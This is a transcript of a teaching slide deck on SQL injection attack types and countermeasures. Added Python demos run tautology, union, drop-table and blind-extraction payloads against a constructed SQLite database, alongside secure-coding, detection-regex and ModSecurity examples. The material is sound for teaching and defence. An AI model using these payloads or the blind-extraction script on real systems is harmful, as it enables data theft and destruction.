SQL Injection Attack
Transcript of "SQL Injection Attack" (slide deck)
Sql Injection Attack

Outline
- Web application
- SQLIA (SQL injection attack)
- SQLIA: attack types
- SQLIA: countermeasures
SQLIA
OWASP

WEB APPLICATION

SQLIA
SQLIA types
- Tautologies
- Illegal/Logically Incorrect Queries
- Union Query
- Piggy-Backed Queries
- Stored Procedures
- Inference
- Alternate Encodings
Tautologies attack
Example: SELECT * FROM user WHERE id = 1 or 1 = 1 AND password = 1111
The injected condition 1 = 1 is always true (a tautology), so the WHERE clause can be satisfied without knowing a valid id; with a trailing comment marker (--) the remaining password check is discarded as well.
Illegal/Logically Incorrect Queries attack
Injected into the pin field: convert(int, (select top 1 name from sysobjects where xtype='u'))
Query built at the CGI layer: SELECT accounts FROM users WHERE login='' AND pass='' AND pin= convert(int, (select top 1 name from sysobjects where xtype='u'))
Error returned by the SQL server: "Microsoft OLE DB Provider for SQL Server (0x80040E07) Error converting nvarchar value 'CreditCards' to a column of data type int."
What the attacker learns from the error message:
1. the back end is Microsoft SQL Server;
2. a user table named CreditCards exists.
Union Query attack
Vulnerable PHP code:
$sqlquery = "SELECT * From news WHERE id = $id";
$process = odbc_exec($sqlconnect, $sqlquery);
echo odbc_result($process, 2);
Injected id: 1 and 1=0 union select 1,@@version,3 --
Resulting query: SELECT * From news WHERE id = 1 and 1=0 union select 1,@@version,3 --
The first SELECT returns no rows (1=0), so the page prints the second column of the injected row, i.e. the database server version (@@version).
Piggy-Backed Queries attack
Injected into the password field: '; drop table users --
Resulting query: SELECT accounts FROM users WHERE login='doe' AND pass=''; drop table users -- ' AND pin=123
Result: the second statement runs and the users table is dropped.
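Added example (not from the slides): the tautology, union and piggy-backed payloads above run against a small SQLite database built in memory, with the query assembled by string concatenation exactly as in the slides' pseudocode, and the same login attempted through a parameterised query for comparison. The schema, the sample rows and all function names are constructed for this demonstration; sqlite_version() stands in for MSSQL's @@version, and executescript() models a driver that permits stacked statements. The error-based (illegal query) case is not reproduced because SQLite does not raise on the conversion the slide relies on.

```python
import sqlite3

# Constructed sample schema for the demonstration (added example, not from the slides).
SCHEMA = """
CREATE TABLE users (login TEXT, pass TEXT, pin INTEGER, accounts TEXT);
INSERT INTO users VALUES ('doe', 's3cret', 1234, 'ACC-001');
INSERT INTO users VALUES ('legalUser', 'hunter2', 4321, 'ACC-002');
CREATE TABLE news (id INTEGER, title TEXT, body TEXT);
INSERT INTO news VALUES (1, 'Welcome', 'first post');
"""


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def vulnerable_login_sql(login, pw, pin):
    """Builds the query the way the slides' pseudocode does: by concatenating
    untrusted input straight into the SQL text."""
    return (f"SELECT accounts FROM users WHERE login='{login}' "
            f"AND pass='{pw}' AND pin={pin}")


def vulnerable_news_sql(news_id):
    """The slides' PHP example, SELECT * From news WHERE id=$id, in Python."""
    return f"SELECT * FROM news WHERE id = {news_id}"


def run_single(con, sql):
    # sqlite3's execute() refuses more than one statement per call, which is
    # why the piggy-backed case below needs a stacked-statement path.
    return con.execute(sql).fetchall()


def run_stacked(con, sql):
    # executescript() runs every ';'-separated statement, modelling a driver
    # that permits stacked queries. It returns no rows.
    con.executescript(sql)


def tautology_attack(con):
    # login field: ' OR 1=1 --   (the comment removes the password and pin checks)
    sql = vulnerable_login_sql("' OR 1=1 --", "wrong", 0)
    return run_single(con, sql)   # every account, no credentials needed


def union_attack(con):
    # id field; sqlite_version() stands in for MSSQL's @@version
    payload = "1 AND 1=0 UNION SELECT 1, sqlite_version(), 3 --"
    rows = run_single(con, vulnerable_news_sql(payload))
    return rows[0][1]             # second column, as odbc_result($process, 2) printed it


def table_exists(con, name):
    row = con.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)
    ).fetchone()
    return row is not None


def piggyback_attack(con):
    # password field: '; DROP TABLE users --
    sql = vulnerable_login_sql("doe", "'; DROP TABLE users --", 123)
    run_stacked(con, sql)
    return table_exists(con, "users")   # False once the stacked DROP has run


def safe_login(con, login, pw, pin):
    """Parameterised form: values travel separately from the SQL text, so
    quotes, comments and semicolons in the input are just data."""
    return con.execute(
        "SELECT accounts FROM users WHERE login=? AND pass=? AND pin=?",
        (login, pw, pin),
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("tautology   :", tautology_attack(db))
    print("union       :", union_attack(db))
    print("safe, attack:", safe_login(db, "' OR 1=1 --", "wrong", 0))
    print("safe, valid :", safe_login(db, "doe", "s3cret", 1234))
    print("users table before piggyback:", table_exists(db, "users"))
    print("users table after piggyback :", piggyback_attack(db))
```

Run it as a script to see the three payloads succeed against the concatenated query and the tautology payload return nothing against the parameterised one; note that the piggy-backed step only works through the stacked-statement path, so refusing multiple statements per call is itself a useful driver-level mitigation.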
Stored Procedures attack
Vulnerable stored procedure:
CREATE PROCEDURE DBO.isAuthenticated @userName varchar2, @pass varchar2, @pin int
AS
EXEC("SELECT accounts FROM users WHERE login='" + @userName + "' and pass='" + @pass + "' and pin=" + @pin);
GO
Injected into the password field: '; SHUTDOWN; --
Resulting query: SELECT accounts FROM users WHERE login='doe' AND pass=''; SHUTDOWN; -- AND pin=
Result: the database server is shut down. Moving the concatenation into a stored procedure does not help; the procedure still builds the query from untrusted strings.
Alternate Encodings attack
Injected into the login field: legalUser'; exec(char(0x73687574646f776e)) --
Resulting query: SELECT accounts FROM users WHERE login='legalUser'; exec(char(0x73687574646f776e)) -- AND pass=''
The hex literal 0x73687574646f776e decodes to the string "shutdown", so the server is shut down, while an input filter that looks for the keyword SHUTDOWN sees only a hex number.
Inference attack
1. Blind injection: the attacker asks the application true/false questions and watches how the response changes.
Query 1: SELECT accounts FROM users WHERE login='legalUser' and 1=0 -- AND pass='' AND pin=0
Query 2: SELECT accounts FROM users WHERE login='legalUser' and 1=1 -- AND pass='' AND pin=0
If both queries produce the same response, the login parameter is not injectable (the input is validated or sanitised). If the responses differ, the login parameter is injectable.
Inference attack (continued)
2. Timing attack: the answer is read from the response time instead of the page content.
SELECT accounts FROM users WHERE login='legalUser' and ASCII(SUBSTRING((select top 1 name from sysobjects),1,1)) > X WAITFOR 5 -- AND pass='' AND pin=0
If the first character of the first table name has an ASCII code greater than X, the server delays its response by 5 seconds (the slide abbreviates T-SQL's WAITFOR DELAY '0:0:5'); by varying X the attacker recovers the name one character at a time.
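Added example (not from the slides): the blind inference attack implemented end to end against an in-memory SQLite target. The application model, the table and all helper names are constructed for this demonstration; sqlite_master and unicode()/substr() stand in for sysobjects and ASCII()/SUBSTRING(), and a row/no-row oracle replaces the timing channel, since SQLite has no WAITFOR. is_injectable() is the slide's 1=0 versus 1=1 probe pair; the extraction generalises the slide's single "> X" question into a binary search over the character code, which is how the name is recovered in practice.

```python
import sqlite3


# Constructed target database (added example; not from the slides). Only one
# table exists, so the "first table name" the attacker recovers is 'users'.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (login TEXT, pass TEXT, pin INTEGER, accounts TEXT);
        INSERT INTO users VALUES ('legalUser', 'hunter2', 4321, 'ACC-002');
    """)
    return con


class BlindTarget:
    """Models the vulnerable application: it concatenates the login field into
    the query and reveals only whether any account row came back."""

    def __init__(self, con):
        self.con = con
        self.queries = 0   # cost of the attack, for the reader

    def login_returns_rows(self, login_field):
        sql = (f"SELECT accounts FROM users WHERE login='{login_field}' "
               f"AND pass='' AND pin=0")
        self.queries += 1
        return bool(self.con.execute(sql).fetchall())


# sqlite_master is SQLite's analogue of MSSQL's sysobjects.
FIRST_TABLE = ("(SELECT name FROM sqlite_master WHERE type='table' "
               "ORDER BY name LIMIT 1)")


def ask(target, condition):
    """One yes/no question. The payload legalUser' AND (<condition>) -- makes
    the row for legalUser come back only when the condition holds."""
    return target.login_returns_rows(f"legalUser' AND ({condition}) --")


def is_injectable(target):
    """The slide's two probes: 'and 1=0' and 'and 1=1' must behave differently."""
    return ask(target, "1=0") != ask(target, "1=1")


def binary_search(target, expr, hi):
    """Recover the integer value of expr (0 <= value <= hi) using only
    'expr > X' questions; about log2(hi) requests per value."""
    lo = 0
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(target, f"{expr} > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def blind_extract_first_table(target, max_len=64):
    """Learn the length first, then each character code (ASCII range)."""
    length = binary_search(target, f"length({FIRST_TABLE})", max_len)
    name = ""
    for i in range(1, length + 1):
        # unicode()/substr() stand in for ASCII()/SUBSTRING() in the slide's payload
        code = binary_search(target, f"unicode(substr({FIRST_TABLE}, {i}, 1))", 127)
        name += chr(code)
    return name


if __name__ == "__main__":
    t = BlindTarget(make_db())
    print("login parameter injectable:", is_injectable(t))
    print("first table name          :", blind_extract_first_table(t))
    print("requests sent             :", t.queries)
```

For a timing variant, only ask() changes: the condition is wrapped so that a true answer delays the response, and login_returns_rows() is replaced by a wall-clock measurement; the search logic stays the same.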
Countermeasures
- WAVES
- JDBC-Checker
- Valeur et al.
- proxy-based filtering
- SQLrand
WAVES: black-box scanner that uses a web crawler to find injection points.
JDBC-Checker: static checking of the SQL queries that Java code builds dynamically.
AMNESIA: combines static analysis of the application's queries with runtime monitoring.
SQL DOM and Safe Query Objects: API-based approaches; queries are built through a typed API instead of string concatenation.
Valeur et al.: intrusion detection approach; produces both false positives and false negatives.
Security Gateway: proxy filtering, with the filtering policy written in SPDL.
SQLrand: randomises the SQL keywords the application uses; a proxy translates the randomised queries back to standard SQL for the database, so injected standard keywords become syntax errors.
- CODE SECURELY
- MONITOR FOR ATTACKS
- BLOCK ATTACKS
CODE SECURELY
Secure coding examples in Perl, Java and VB.NET

Java
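Added example (not from the slides, and in Python rather than the Perl/Java/VB.NET of the original): secure coding for the one case that parameter binding cannot cover, a user-chosen sort column and direction. Values are bound as parameters, identifiers are mapped through fixed allow-lists, and LIKE metacharacters are escaped so the input cannot widen the pattern. The schema, data and function names are constructed for this demonstration.

```python
import sqlite3


# Constructed sample data (added example; not from the slides).
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (login TEXT, pass TEXT, pin INTEGER, accounts TEXT);
        INSERT INTO users VALUES ('doe', 's3cret', 1234, 'ACC-001');
        INSERT INTO users VALUES ('legalUser', 'hunter2', 4321, 'ACC-002');
    """)
    return con


# Identifiers (column names, ASC/DESC) cannot be bound as parameters, so they
# are mapped through allow-lists; anything not in the list is rejected.
SORTABLE_COLUMNS = {"login": "login", "accounts": "accounts"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def is_allowed_sort(sort_by, direction="asc"):
    return sort_by in SORTABLE_COLUMNS and direction.lower() in DIRECTIONS


def escape_like(value):
    """Escape LIKE metacharacters so user input cannot widen the pattern."""
    return (value.replace("\\", "\\\\")
                 .replace("%", "\\%")
                 .replace("_", "\\_"))


def search_accounts(con, login_prefix, sort_by="login", direction="asc"):
    if not is_allowed_sort(sort_by, direction):
        raise ValueError(f"unsupported sort parameters: {sort_by!r}, {direction!r}")
    column = SORTABLE_COLUMNS[sort_by]
    order = DIRECTIONS[direction.lower()]
    # The only dynamic parts of the SQL text come from the allow-lists above;
    # the user-supplied prefix travels as a bound parameter.
    sql = ("SELECT login, accounts FROM users WHERE login LIKE ? ESCAPE '\\' "
           "ORDER BY " + column + " " + order)
    return con.execute(sql, (escape_like(login_prefix) + "%",)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(search_accounts(db, "do"))                      # prefix match
    print(search_accounts(db, "%"))                       # literal '%' prefix, not a wildcard
    print(search_accounts(db, "", "accounts", "desc"))    # allow-listed identifiers
    print(is_allowed_sort("accounts; DROP TABLE users --"))  # False: never reaches the SQL
```

The point of the allow-list is that the SQL text is assembled only from constants the program itself defines; the request can choose among them but never contribute characters to the query.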
MONITOR FOR ATTACKS
- Network intrusion detection systems (NIDS): pattern matching, e.g. Snort signatures written as regular expressions
- Host-based IDS (HIDS)
- Application-level IDS (AppIDS)
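Added example (not from the slides): a small regular-expression detector of the kind a NIDS signature set carries, run over constructed web-server access-log lines that contain the payloads from the earlier slides. The rules, log lines and function names are this example's own. It also shows why the alternate-encodings slide matters for monitoring: the hex-encoded exec(0x73687574646f776e) payload only trips a "shutdown" signature after the argument has been decoded.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (added example; not from the slides). Query
# strings are URL-encoded the way a web server logs them.
LOG_LINES = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /login?user=doe&pass=s3cret HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Oct/2023:13:55:40 +0000] "GET /login?user=%27+or+1%3D1+--&pass=x HTTP/1.1" 200 9031',
    '10.0.0.9 - - [10/Oct/2023:13:55:44 +0000] "GET /news?id=1+and+1%3D0+union+select+1%2C%40%40version%2C3+-- HTTP/1.1" 200 700',
    '10.0.0.9 - - [10/Oct/2023:13:55:49 +0000] "GET /login?user=doe&pass=%27%3B+drop+table+users+-- HTTP/1.1" 500 120',
    '10.0.0.9 - - [10/Oct/2023:13:55:52 +0000] "GET /login?user=legalUser%27%3B+exec(0x73687574646f776e)+--&pass=x HTTP/1.1" 500 120',
]

# Signature-style rules, one per attack class seen in the slides.
RULES = {
    "tautology": re.compile(r"(?:'|\b)\s*or\s+['\d]+\s*=\s*['\d]+", re.I),
    "union":     re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "stacked":   re.compile(r";\s*(?:drop|delete|insert|update|exec|shutdown)\b", re.I),
    "comment":   re.compile(r"--|/\*"),
    "shutdown":  re.compile(r"\bshutdown\b", re.I),
}

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
HEX_LITERAL = re.compile(r"0x([0-9a-fA-F]+)")


def query_string(log_line):
    """URL-decoded query string of the request, or '' if there is none."""
    m = REQUEST_RE.search(log_line)
    if not m or "?" not in m.group(1):
        return ""
    return unquote_plus(m.group(1).split("?", 1)[1])


def decode_hex_literals(text):
    """Replace SQL hex literals by the ASCII they encode (0x7368... -> shutdown).
    Odd-length or non-ASCII literals are left untouched."""
    def repl(m):
        digits = m.group(1)
        if len(digits) % 2:
            return m.group(0)
        try:
            return bytes.fromhex(digits).decode("ascii")
        except UnicodeDecodeError:
            return m.group(0)
    return HEX_LITERAL.sub(repl, text)


def detect(log_line, normalize=True):
    """Names of the rules that fire on this log line."""
    qs = query_string(log_line)
    if normalize:
        qs = decode_hex_literals(qs)
    return {name for name, rx in RULES.items() if rx.search(qs)}


if __name__ == "__main__":
    for line in LOG_LINES:
        print(sorted(detect(line, normalize=False)), "->", sorted(detect(line)), "|", query_string(line))
```

Pattern matching of this kind is cheap and explains why the slides list alternate encodings as a separate attack class: every signature is only as good as the normalisation in front of it, and an attacker who can reach the database through an encoding the sensor does not decode is invisible to it.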
BLOCK ATTACKS
- Application firewalls
- Web-application firewalls: unlike a network IDS, they inspect the request after SSL termination, so encrypted traffic does not hide the attack
BLOCK ATTACKS: products
- Cisco Application Velocity System (AVS), with built-in attack blocking
- ModSecurity
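Added example (not from the slides): a minimal ModSecurity configuration in the v2 rule language that blocks SQL injection in request arguments. The rule ids and messages are placeholders chosen for this example; @detectSQLi is ModSecurity's libinjection-based operator, and the second rule is a plain signature of the tautology seen on the earlier slides.

```apache
# Added example (not from the slides). ModSecurity v2 rule language; ids are placeholders.
SecRuleEngine On

# libinjection tokenises the argument as SQL instead of matching keywords, so it
# is less dependent on the exact spelling or encoding of the payload.
# t:urlDecodeUni normalises the argument before the operator runs.
SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES "@detectSQLi" \
    "id:100001,phase:2,t:urlDecodeUni,deny,status:403,log,msg:'SQL injection detected by libinjection'"

# Signature-style fallback for the classic tautology: ' or 1=1 --
SecRule ARGS "@rx (?i)(?:'|\b)\s*or\s+['\d]+\s*=\s*['\d]+" \
    "id:100002,phase:2,t:urlDecodeUni,deny,status:403,log,msg:'SQL injection tautology pattern'"
```

Blocking at this layer is a complement to secure coding, not a replacement: the firewall only sees the request, never the query the application actually builds from it.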
Questions?

' or 1=1 --
Select @@version
') or 1 = 1 --
ASCII(SUBSTRING((select top 1 name from sysobjects),1,1)) > X WAITFOR 5 --
exec(0x73687574646f776e) --